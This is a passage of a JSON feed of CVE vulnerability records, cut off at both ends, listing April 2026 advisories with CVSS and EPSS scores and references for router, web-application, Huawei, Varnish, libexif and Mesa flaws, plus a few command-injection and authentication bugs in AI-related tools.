availability.","cvss":5.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.6,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00392,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinlaptops/2026/4/"],"published_time":"2026-04-13T04:16:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6153","summary":"A vulnerability was identified in code-projects Vehicle Showroom Management System 1.0. Impacted is an unknown function of the file /util/StaffDetailsFunction.php. Such manipulation of the argument STAFF_ID leads to sql injection. The attack can be launched remotely. The exploit is publicly available and might be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/zheng-lv/CVE-/issues/4","https://vuldb.com/submit/796315","https://vuldb.com/vuln/357033","https://vuldb.com/vuln/357033/cti"],"published_time":"2026-04-13T04:16:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34853","summary":"Permission bypass vulnerability in the LBS module.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":7.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.7,"cvss_v4":null,"epss":5e-05,"ranking_epss":0.00267,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinvision/2026/4/"],"published_time":"2026-04-13T04:16:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34856","summary":"UAF vulnerability in the communication module.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":7.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.3,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00276,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinwearables/2026/4/"],"published_time":"2026-04-13T04:16:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34860","summary":"Access control vulnerability in the memo module.\nImpact: Successful exploitation of this vulnerability will affect availability and confidentiality.","cvss":4.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.1,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00392,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinlaptops/2026/4/"],"published_time":"2026-04-13T04:16:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34851","summary":"Race condition vulnerability in the event notification module.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":2.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.2,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00319,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinlaptops/2026/4/"],"published_time":"2026-04-13T04:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34852","summary":"Stack overflow vulnerability in the media platform.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00309,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinlaptops/2026/4/","https://consumer.huawei.com/en/support/bulletinwearables/2026/4/"],"published_time":"2026-04-13T04:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34850","summary":"Race condition vulnerability in the notification service.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":1.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":1.9,"cvss_v4":null,"epss":5e-05,"ranking_epss":0.00262,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinlaptops/2026/4/"],"published_time":"2026-04-13T04:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-28553","summary":"Vulnerability of improper permission control in the theme setting module.\nImpact: Successful exploitation of this vulnerability may affect service confidentiality.","cvss":6.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.9,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00414,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/"],"published_time":"2026-04-13T04:16:03","vendor":"huawei","product":"harmonyos","version":null},{"cve_id":"CVE-2026-28553","summary":"Vulnerability of improper permission control in the theme setting module.\nImpact: Successful exploitation of this vulnerability may affect service confidentiality.","cvss":6.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.9,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00414,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/"],"published_time":"2026-04-13T04:16:03","vendor":"huawei","product":"emui","version":null},{"cve_id":"CVE-2026-6152","summary":"A vulnerability was determined in code-projects Vehicle Showroom Management System 1.0. This issue affects some unknown processing of the file /util/StaffAddingFunction.php. This manipulation of the argument STAFF_ID causes sql injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/zheng-lv/CVE-/issues/3","https://vuldb.com/submit/796312","https://vuldb.com/vuln/357032","https://vuldb.com/vuln/357032/cti"],"published_time":"2026-04-13T03:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6179","summary":"Stored Cross Site Scripting in NightWolf Penetration Testing Platform allows attack trigger and run malicious script in user's browser","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.00047,"ranking_epss":0.14223,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://bug.report.night-wolf.io/changelogs"],"published_time":"2026-04-13T03:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6150","summary":"A vulnerability has been found in code-projects Simple Laundry System 1.0. This affects an unknown part of the file /checkupdatestatus.php. The manipulation of the argument serviceId leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00033,"ranking_epss":0.09343,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/zheng-lv/CVE-/issues/1","https://vuldb.com/submit/796309","https://vuldb.com/vuln/357030","https://vuldb.com/vuln/357030/cti"],"published_time":"2026-04-13T03:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6151","summary":"A vulnerability was found in code-projects Vehicle Showroom Management System 1.0. This vulnerability affects unknown code of the file /util/PaymentStatusFunction.php. The manipulation of the argument CUSTOMER_ID results in sql injection. It is possible to launch the attack remotely. The exploit has been made public and could be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/zheng-lv/CVE-/issues/2","https://vuldb.com/submit/796311","https://vuldb.com/vuln/357031","https://vuldb.com/vuln/357031/cti"],"published_time":"2026-04-13T03:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6148","summary":"A vulnerability was detected in code-projects Vehicle Showroom Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /util/MonthTotalReportUpdateFunction.php. Performing a manipulation of the argument BRANCH_ID results in sql injection. The attack is possible to be carried out remotely. The exploit is now public and may be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/mrpgi/cve/issues/2","https://vuldb.com/submit/796280","https://vuldb.com/vuln/357028","https://vuldb.com/vuln/357028/cti"],"published_time":"2026-04-13T02:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6149","summary":"A flaw has been found in code-projects Vehicle Showroom Management System 1.0. Affected by this issue is some unknown functionality of the file /util/BookVehicleFunction.php. Executing a manipulation of the argument BRANCH_ID can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/mrpgi/cve/issues/4","https://vuldb.com/submit/796282","https://vuldb.com/vuln/357029","https://vuldb.com/vuln/357029/cti"],"published_time":"2026-04-13T02:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6143","summary":"A security flaw has been discovered in farion1231 cc-switch up to 3.12.3. Affected by this issue is some unknown functionality of the file src-tauri/src/proxy/server.rs of the component ProxyServer. The manipulation results in permissive cross-domain policy with untrusted domains. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00021,"ranking_epss":0.05558,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/farion1231/cc-switch/","https://github.com/farion1231/cc-switch/issues/1841","https://github.com/farion1231/cc-switch/issues/1841#issue-4191294952","https://github.com/farion1231/cc-switch/pull/1915","https://vuldb.com/submit/796145","https://vuldb.com/vuln/357007","https://vuldb.com/vuln/357007/cti"],"published_time":"2026-04-13T02:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6142","summary":"A vulnerability was identified in tushar-2223 Hotel Management System up to bb1f3b3666124b888f1e4bcf51b6fba9fbb01d15. Affected by this vulnerability is an unknown functionality of the file /admin/roomdelete.php. The manipulation of the argument ID leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gist.github.com/freeloader9527/a9ab20c922c6aa2b3eabf93e01a40f6b","https://github.com/tushar-2223/Hotel-Management-System/issues/15","https://vuldb.com/submit/795751","https://vuldb.com/vuln/357006","https://vuldb.com/vuln/357006/cti"],"published_time":"2026-04-13T01:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25204","summary":"Deserialization of untrusted data vulnerability in Samsung Open Source Escargot Java Script allows denial of service condition via process abort.\n\nThis issue affects escarogt prior to commit hash \n\n97e8115ab1110bc502b4b5e4a0c689a71520d335","cvss":6.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02435,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Samsung/escargot/pull/1554"],"published_time":"2026-04-13T01:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6139","summary":"A vulnerability has been found in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function UploadOpenVpnCert of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument FileName leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_192/README.md","https://vuldb.com/submit/792982","https://vuldb.com/vuln/357003","https://vuldb.com/vuln/357003/cti","https://www.totolink.net/"],"published_time":"2026-04-13T01:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6140","summary":"A vulnerability was found in Totolink A7100RU 7.4cu.2313_b20191024. This impacts the function UploadFirmwareFile of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument FileName results in os command injection. The attack may be initiated remotely. The exploit has been made public and could be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_193/README.md","https://vuldb.com/submit/792987","https://vuldb.com/vuln/357004","https://vuldb.com/vuln/357004/cti","https://www.totolink.net/"],"published_time":"2026-04-13T01:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6141","summary":"A vulnerability was determined in danielmiessler Personal_AI_Infrastructure up to 2.3.0. Affected is an unknown function of the file Skills/Parser/Tools/parse_url.ts. Executing a manipulation can lead to os command injection. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. This patch is called 14322e87e58bf585cf3c7b9295578a6eb7dc4945. It is advisable to implement a patch to correct this issue. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00734,"ranking_epss":0.7275,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/danielmiessler/Personal_AI_Infrastructure/","https://github.com/danielmiessler/Personal_AI_Infrastructure/commit/14322e87e58bf585cf3c7b9295578a6eb7dc4945","https://github.com/danielmiessler/Personal_AI_Infrastructure/pull/659","https://github.com/danielmiessler/Personal_AI_Infrastructure/pull/659#issuecomment-3905020094","https://vuldb.com/submit/793438","https://vuldb.com/vuln/357005","https://vuldb.com/vuln/357005/cti"],"published_time":"2026-04-13T01:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6136","summary":"A security vulnerability has been detected in Tenda F451 1.0.0.7_cn_svn7958. Impacted is the function frmL7ImForm of the file /goform/L7Im. The manipulation of the argument page leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/21","https://vuldb.com/submit/792880","https://vuldb.com/vuln/357000","https://vuldb.com/vuln/357000/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-13T00:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6137","summary":"A vulnerability was detected in Tenda F451 1.0.0.7_cn_svn7958. The affected element is the function fromAdvSetWan of the file /goform/AdvSetWan. The manipulation of the argument wanmode/PPPOEPassword results in stack-based buffer overflow. It is possible to launch the attack remotely. The exploit is now public and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/22","https://vuldb.com/submit/792881","https://vuldb.com/vuln/357001","https://vuldb.com/vuln/357001/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-13T00:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6138","summary":"A flaw has been found in Totolink A7100RU 7.4cu.2313_b20191024. The impacted element is the function setAccessDeviceCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument mac causes os command injection. The attack can be initiated remotely. The exploit has been published and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_191/README.md","https://vuldb.com/submit/792980","https://vuldb.com/vuln/357002","https://vuldb.com/vuln/357002/cti","https://www.totolink.net/"],"published_time":"2026-04-13T00:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6135","summary":"A weakness has been identified in Tenda F451 1.0.0.7_cn_svn7958. This issue affects the function fromSetIpBind of the file /goform/SetIpBind. Executing a manipulation of the argument page can lead to stack-based buffer overflow. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/19","https://vuldb.com/submit/792877","https://vuldb.com/vuln/356999","https://vuldb.com/vuln/356999/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-13T00:16:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6133","summary":"A vulnerability was identified in Tenda F451 1.0.0.7_cn_svn7958. This affects the function fromSafeUrlFilter of the file /goform/SafeUrlFilter. Such manipulation of the argument page leads to stack-based buffer overflow. The attack can be executed remotely. The exploit is publicly available and might be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/17","https://vuldb.com/submit/792875","https://vuldb.com/vuln/356997","https://vuldb.com/vuln/356997/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-12T23:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6134","summary":"A security flaw has been discovered in Tenda F451 1.0.0.7_cn_svn7958. This vulnerability affects the function fromqossetting of the file /goform/qossetting. Performing a manipulation of the argument qos results in stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00017,"ranking_epss":0.04081,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/18","https://vuldb.com/submit/792876","https://vuldb.com/vuln/356998","https://vuldb.com/vuln/356998/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-12T23:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6131","summary":"A vulnerability was found in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this vulnerability is the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument command results in os command injection. The attack may be launched remotely. The exploit has been made public and could be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_182/README.md","https://vuldb.com/submit/792251","https://vuldb.com/vuln/356995","https://vuldb.com/vuln/356995/cti","https://www.totolink.net/"],"published_time":"2026-04-12T23:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6132","summary":"A vulnerability was determined in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this issue is the function setLedCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument enable causes os command injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_183/README.md","https://vuldb.com/submit/792252","https://vuldb.com/vuln/356996","https://vuldb.com/vuln/356996/cti","https://www.totolink.net/"],"published_time":"2026-04-12T23:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6130","summary":"A flaw has been found in chatboxai chatbox up to 1.20.0. This impacts the function StdioClientTransport of the file src/main/mcp/ipc-stdio-transport.ts of the component Model Context Protocol Server Management System. Executing a manipulation of the argument args/env can lead to os command injection. The attack can be launched remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.00837,"ranking_epss":0.74667,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chatboxai/chatbox/","https://github.com/chatboxai/chatbox/issues/3627","https://github.com/chatboxai/chatbox/issues/3627#issue-4193060116","https://vuldb.com/submit/795355","https://vuldb.com/vuln/356993","https://vuldb.com/vuln/356993/cti"],"published_time":"2026-04-12T22:16:09","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40396","summary":"Varnish Cache 9 before 9.0.1 allows a \"workspace overflow\" denial of service (daemon panic) after timeout_linger. A malicious client could send an HTTP/1 request, wait long enough until the session releases its worker thread (timeout_linger) and resume traffic before the session is closed (timeout_idle) sending more than one request at once to trigger a pipelining operation between requests. This vulnerability affecting Varnish Cache 9.0.0 emerged from a port of the Varnish Enterprise non-blocking architecture for HTTP/2. New code was needed to adapt to a more recent workspace API that formalizes the pipelining operation. In addition to the workspace change on the Varnish Cache side, other differences created merge conflicts, like partial support for trailers in Varnish Enterprise. The conflict resolution missed one code path configuring pipelining to perform a complete workspace rollback, losing the guarantee that prefetched data would fit inside workspace_client during the transition from one request to the next. This can result in a workspace overflow, triggering a panic and crashing the Varnish server.","cvss":4.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.0,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.0163,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/varnish/varnish/issues/15","https://github.com/varnish/varnish/releases/tag/varnish-9.0.1"],"published_time":"2026-04-12T20:16:19","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6129","summary":"A vulnerability was detected in zhayujie chatgpt-on-wechat CowAgent up to 2.0.4. This affects an unknown function of the component Agent Mode Service. Performing a manipulation results in missing authentication. The attack can be initiated remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.00088,"ranking_epss":0.25042,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/zhayujie/chatgpt-on-wechat/issues/2741","https://github.com/zhayujie/chatgpt-on-wechat/issues/2741#issue-4191903266","https://vuldb.com/submit/795272","https://vuldb.com/vuln/356992","https://vuldb.com/vuln/356992/cti"],"published_time":"2026-04-12T20:16:19","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40395","summary":"Varnish Enterprise before 6.0.16r12 allows a \"workspace overflow\" denial of service (daemon panic) for shared VCL. The headerplus.write_req0() function from vmod_headerplus updates the underlying req0, which is normally the original read-only request from which req is derived (readable and writable from VCL). This is useful in the active VCL, after amending req, to prepare a refined req0 before switching to a different VCL with the return (vcl(<label>)) action. This is for example how the Varnish Controller operates shared VCL deployments. If the amended req contained too many header fields for req0, this would have resulted in a workspace overflow that would in turn trigger a panic and crash the Varnish Enterprise server. This could be used as a Denial of Service attack vector by malicious clients.","cvss":4.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.0,"cvss_v4":null,"epss":0.00039,"ranking_epss":0.11505,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://docs.varnish-software.com/security/VEV00003/"],"published_time":"2026-04-12T20:16:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40394","summary":"Varnish Cache 9 before 9.0.1 and Varnish Enterprise before 6.0.16r11 allows a \"workspace overflow\" denial of service (daemon panic) for certain amounts of prefetched data. The setup of an HTTP/2 session starts with a speculative HTTP/1 transport, and upon upgrading to h2 the HTTP/1 request is repurposed as stream zero. During the upgrade, a buffer allocation is made to reserve space to send frames to the client. This allocation would split the original workspace, and depending on the amount of prefetched data, the next fetch could perform a pipelining operation that would run out of workspace.","cvss":4.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.0,"cvss_v4":null,"epss":0.00039,"ranking_epss":0.11505,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://docs.varnish-software.com/security/VEV00002/"],"published_time":"2026-04-12T20:16:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40385","summary":"In libexif through 0.6.25, an unsigned 32bit integer overflow in Nikon MakerNote handling could be used by local attackers to cause crashes or information leaks. This only affects 32bit systems.","cvss":4.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.0,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.01922,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/libexif/libexif/commit/93003b93e50b3d259bd2227d8775b73a53c35d58"],"published_time":"2026-04-12T19:16:20","vendor":"libexif_project","product":"libexif","version":null},{"cve_id":"CVE-2026-40386","summary":"In libexif through 0.6.25, an integer underflow in size checking for Fuji and Olympus MakerNote decoding could be used by attackers to crash or leak information out of libexif-using programs.","cvss":4.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.0,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.01922,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/libexif/libexif/commit/dc6eac6e9655d14d0779d99e82d0f5f442d2f34b"],"published_time":"2026-04-12T19:16:20","vendor":"libexif_project","product":"libexif","version":null},{"cve_id":"CVE-2026-40393","summary":"In Mesa before 25.3.6 and 26 before 26.0.1, out-of-bounds memory access can occur in WebGPU because the amount of to-be-allocated data depends on an untrusted party, and is then used for alloca.","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":0.00043,"ranking_epss":0.12876,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gitlab.freedesktop.org/mesa/mesa/-/merge_requests/39866","https://lists.freedesktop.org/archives/mesa-dev/2026-February/226597.html"],"published_time":"2026-04-12T19:16:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25710","summary":"Dolibarr ERP-CRM 8.0.4 contains an SQL injection vulnerability in the rowid parameter of the admin dict.php endpoint that allows attackers to execute arbitrary SQL queries. Attackers can inject malicious SQL code through the rowid POST parameter to extract sensitive database information using error-based SQL injection techniques.","cvss":8.8,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.2,"cvss_v4":8.8,"epss":0.0003,"ranking_epss":0.08491,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/8.0.4/dolibarr-8.0.4.zip","https://www.dolibarr.org/","https://www.exploit-db.com/exploits/46095","https://www.vulncheck.com/advisories/dolibarr-erp-crm-sql-injection-via-rowid-parameter"],"published_time":"2026-04-12T13:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25711","summary":"SpotFTP Password Recover 2.4.2 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an oversized buffer in the Name field during registration. Attackers can generate a 256-byte payload, paste it into the Name input field, and trigger a crash when submitting the registration code.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":6.9,"epss":0.0002,"ranking_epss":0.05285,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.exploit-db.com/exploits/46088","https://www.vulncheck.com/advisories/spotftp-password-recover-denial-of-service-via-name-field"],"published_time":"2026-04-12T13:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25712","summary":"BlueAuditor 1.7.2.0 contains a buffer overflow vulnerability in the registration key field that allows local attackers to crash the application by submitting an oversized key value. Attackers can trigger a denial of service by entering a 256-byte buffer of repeated characters in the Key registration field, causing the application to crash during registration processing.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":6.9,"epss":0.00013,"ranking_epss":0.02068,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.exploit-db.com/exploits/46087","https://www.vulncheck.com/advisories/blueauditor-buffer-overflow-denial-of-service-via-registration-key"],"published_time":"2026-04-12T13:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25713","summary":"MyT-PM 1.5.1 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the Charge[group_total] parameter. Attackers can submit crafted POST requests to the /charge/admin endpoint with error-based, time-based blind, or stacked query payloads to extract sensitive database information or manipulate data.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":7.1,"epss":0.00026,"ranking_epss":0.07016,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://manageyourteam.net/","https://sourceforge.net/projects/myt/","https://www.exploit-db.com/exploits/46084","https://www.vulncheck.com/advisories/myt-pm-sql-injection-via-charge-group-total-parameter"],"published_time":"2026-04-12T13:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25703","summary":"ImpressCMS 1.3.11 contains a time-based blind SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the 